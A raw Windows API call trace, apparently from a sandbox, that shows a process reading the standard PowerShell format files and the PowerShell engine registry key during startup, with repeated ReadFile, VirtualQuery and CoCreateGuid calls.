	[0316.943] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xd1ddfd56, Data2=0x6a18, Data3=0x414e, Data4=([0]=0x91, [1]=0x5c, [2]=0xc6, [3]=0x43, [4]=0x8d, [5]=0xe5, [6]=0x41, [7]=0xa1))) returned 0x0
	[0316.943] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x764ef07f, Data2=0x9951, Data3=0x4aae, Data4=([0]=0xa4, [1]=0xb4, [2]=0xa2, [3]=0xc3, [4]=0x71, [5]=0x6f, [6]=0x65, [7]=0xe))) returned 0x0
	[0316.943] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe597e57e, Data2=0xe746, Data3=0x4284, Data4=([0]=0x98, [1]=0x18, [2]=0x5f, [3]=0x35, [4]=0xa6, [5]=0x52, [6]=0xe5, [7]=0xbd))) returned 0x0
	[0316.943] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.944] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.944] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.944] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x950b162c, Data2=0xcbf, Data3=0x4745, Data4=([0]=0xb6, [1]=0x3d, [2]=0x69, [3]=0xe8, [4]=0xf8, [5]=0x9a, [6]=0xd6, [7]=0x15))) returned 0x0
	[0316.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0316.944] SetErrorMode (uMode=0x1) returned 0x1
	[0316.944] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0316.944] GetFileType (hFile=0x330) returned 0x1
	[0316.945] SetErrorMode (uMode=0x1) returned 0x1
	[0316.945] GetFileType (hFile=0x330) returned 0x1
	[0316.945] ReadFile (in: hFile=0x330, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.945] ReadFile (in: hFile=0x330, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.945] ReadFile (in: hFile=0x330, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.946] ReadFile (in: hFile=0x330, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.946] ReadFile (in: hFile=0x330, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.946] ReadFile (in: hFile=0x330, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.946] ReadFile (in: hFile=0x330, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x1cceb8*=0x119, lpOverlapped=0x0) returned 1
	[0316.946] ReadFile (in: hFile=0x330, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0316.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0316.946] SetErrorMode (uMode=0x1) returned 0x1
	[0316.946] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cce60 | out: lpFileInformation=0x1cce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0316.947] SetErrorMode (uMode=0x1) returned 0x1
	[0316.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0316.947] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf48 | out: phkResult=0x1ccf48*=0x330) returned 0x0
	[0316.947] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccecc, lpData=0x0, lpcbData=0x1ccec8*=0x0 | out: lpType=0x1ccecc*=0x1, lpData=0x0, lpcbData=0x1ccec8*=0x56) returned 0x0
	[0316.947] CoTaskMemAlloc (cb=0x5a) returned 0x31b710
	[0316.947] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce9c, lpData=0x31b710, lpcbData=0x1cce98*=0x56 | out: lpType=0x1cce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cce98*=0x56) returned 0x0
	[0316.947] CoTaskMemFree (pv=0x31b710) 
	[0316.947] RegCloseKey (hKey=0x330) returned 0x0
	[0316.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0316.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0316.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.949] VirtualQuery (in: lpAddress=0x1cb9e0, lpBuffer=0x1cc8a0, dwLength=0x30 | out: lpBuffer=0x1cc8a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.949] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x93b7c2b3, Data2=0xe274, Data3=0x46e1, Data4=([0]=0xa3, [1]=0x28, [2]=0x70, [3]=0x93, [4]=0x6c, [5]=0x3f, [6]=0xc3, [7]=0xee))) returned 0x0
	[0316.949] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.949] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x6cba7fb9, Data2=0xba4d, Data3=0x4827, Data4=([0]=0x91, [1]=0xf5, [2]=0xf7, [3]=0x3f, [4]=0xe3, [5]=0xb0, [6]=0xf3, [7]=0x4c))) returned 0x0
	[0316.950] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xa7557618, Data2=0xd2d0, Data3=0x4c07, Data4=([0]=0xae, [1]=0xf4, [2]=0xe9, [3]=0x41, [4]=0xd6, [5]=0x77, [6]=0xa9, [7]=0x40))) returned 0x0
	[0316.950] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe5abdc61, Data2=0x450d, Data3=0x40f7, Data4=([0]=0x91, [1]=0x71, [2]=0xec, [3]=0x7b, [4]=0x7a, [5]=0x27, [6]=0x20, [7]=0x88))) returned 0x0
	[0316.950] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.950] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0316.950] SetErrorMode (uMode=0x1) returned 0x1
	[0316.950] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0316.951] GetFileType (hFile=0x330) returned 0x1
	[0316.951] SetErrorMode (uMode=0x1) returned 0x1
	[0316.951] GetFileType (hFile=0x330) returned 0x1
	[0316.951] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.952] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.952] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.952] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.952] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.952] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.953] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.953] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.954] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.954] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.954] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.954] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.955] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.955] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.955] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.955] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.957] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.957] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.957] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.957] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.958] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.958] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.958] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.958] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.959] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.959] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.959] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.959] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.960] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.960] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.960] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.960] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.963] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.963] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.963] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.964] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.964] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.964] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.964] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.964] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.964] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.282] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.282] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.283] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.283] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.283] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.283] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.283] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.283] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.283] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.284] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
